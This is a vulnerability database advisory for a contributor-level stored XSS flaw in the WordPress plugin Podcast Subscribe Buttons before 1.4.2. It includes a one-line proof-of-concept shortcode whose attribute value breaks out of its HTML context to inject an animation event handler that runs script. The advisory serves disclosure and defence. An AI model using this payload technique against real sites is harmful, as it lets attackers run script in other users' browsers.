Podcast Subscribe Buttons < 1.4.2 - Contributor+ Stored XSS

2021-09-15T00:00:00
ID WPVDB-ID:998395F0-F176-45B9-BAF7-B50D30538C7D
Type wpvulndb
Reporter apple502j
Modified 2021-09-15T21:24:41

Description

The plugin allows users with any role capable of editing or adding posts to perform stored XSS.

PoC

Add the below payload as a shortcode block: [podcast_subscribe alignment='" style="animation-name:twentytwentyone-close-button-transition" onanimationend="alert(origin)//']